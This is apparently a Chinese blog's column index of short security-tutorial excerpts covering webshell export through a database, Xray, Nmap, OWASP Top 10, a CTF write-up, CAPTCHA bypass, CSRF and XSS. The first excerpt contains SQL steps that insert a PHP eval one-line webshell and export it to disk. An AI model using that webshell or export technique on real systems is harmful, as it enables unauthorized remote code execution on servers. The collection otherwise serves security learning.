漏洞
文章平均质量分 85
ch3uhx9
这个作者很懒,什么都没留下…
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
数据库导出WebShell
简介在控制了用户之后,利用用户的权限(如果比较大),就能够执行sql语句,并且导出WebShell。步骤建立表hack,设置字段名为cmd(text类型并不允许为空);向cmd字段插入字符串,此时字符串为一句话木马;导出cmd字段的内容到硬盘;删除表hack。常用语句AccessCREATE TABLE CMD (A VARCHAR(50))INSERT INTO CMD (A) VALUES('<?php @eval($_POST[cheuhxg]);?>')SE原创 2021-05-11 09:19:44 · 360 阅读 · 1 评论 -
Xray使用教程
简介Xray是长亭科技开发的一款漏扫工具。支持多种扫描方式和漏洞类型。可自定义POC(Proof of Concept)概念验证,即漏洞验证程序。俺是在 乌雲安全 看到了这个工具的使用,作为一个脚本小子初学者,这里做一下笔记。原创 2021-04-12 19:05:25 · 9439 阅读 · 0 评论 -
Nmap使用手册
简介Nmap(Network Mapper)是一款开放源代码的网络探测和安全审核的工具。Nmap以新颖的方式使用原始IP报文来发现网络上有一些主机,那些主机提供什么服务(应用程序名和版本),那些服务运行在什么操作系统(包括版本信息),它们使用什么类型的报文过滤器/防火墙,以及一堆其他功能。参数指定目标参数输入作用-iL从文件列表中读取目-iR选择随机目标--exclude<host1[,host2,host3],…>排除指定主机-原创 2021-03-27 17:33:46 · 201 阅读 · 0 评论 -
OWASP TOP 10解析
简介OWASP Top 10是排名前十的漏洞,需要在日常开发和管理时注意防范。目前最新的是2017年版的,随着时代的更新,漏洞也会不断变化。这里只介绍OWASP Top 10不代表其他漏洞不重要,本文是对其的一个理解和记录。A1:注入介绍将不受信任的数据作为命令或查询的一部分发送到解析器,会产生诸如SQL注入、NoSQL注入、OS注入和LDAP注入的注入缺陷。攻击者的恶意数据可以诱使解析器在没有授权的情况下执行非预期命令或访问数据。攻击点用户提供的数据没有经过应用程序的验证、原创 2021-03-26 11:25:58 · 497 阅读 · 0 评论 -
【CTF日记】BUUOJ篇
[HCTF 2018]WarmUp题目介绍这道题来自BUUCTF,传送门。涉及的知识点包括:PHP代码审计远程文件包含题目代码<?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"原创 2021-03-11 23:29:46 · 849 阅读 · 0 评论 -
Insecure CAPTCHA漏洞利用以及防御
漏洞介绍CAPTCHA项目是Completely Automated Public Turing Test to Tell Computers and Humans Apart (全自动区分计算机和人类的图灵测试)的简称,是一种区分用户是计算机和人的公共全自动程序。使用CAPTCHA可以防止计算机恶意破解密码、刷单等,保证用户是人类(无法快速反复发送请求)。攻击者绕过CAPTCHA验证后,可以使用恶意脚本操控计算机反复发送请求或者在异地实现绕过验证的CSRF攻击。漏洞原理CAPTCHA漏洞利原创 2021-02-28 09:48:24 · 898 阅读 · 0 评论 -
CSRF漏洞介绍以及基本防御
漏洞介绍跨站请求伪造,也被称为one-click attack或者session riding,通常缩写为 CSRF 或者 XSRF。是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨网站脚本相比,XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网页浏览器的信任。通俗的可以理解为:攻击者盗用你的身份,利用网站对你的信任发起恶意请求。漏洞原理登录访问受信网站后,网站会发送Cookie到客户端,以确认用户的身份。如果用户还未登出受信网站,同时原创 2021-02-28 09:46:02 · 246 阅读 · 0 评论 -
XSS漏洞
漏洞介绍定义XSS本名Cross-Site Scripting跨站脚本,是攻击者将恶意JavaScript脚本植入服务器而形成对访问者的攻击。攻击流程攻击者通过评论区一类的存储点,将写好的JavaScript脚本写入服务器。服务器存储后,在用户访问页面时,携带恶意脚本返回给用户。此时恶意代码被执行,用户的信息将会发送到攻击者的服务器,完成攻击。漏洞详解原理使用页面元素,比如<script>JavaScript-Code</script>包含恶意代码植入,原创 2021-02-28 09:41:44 · 350 阅读 · 0 评论
分享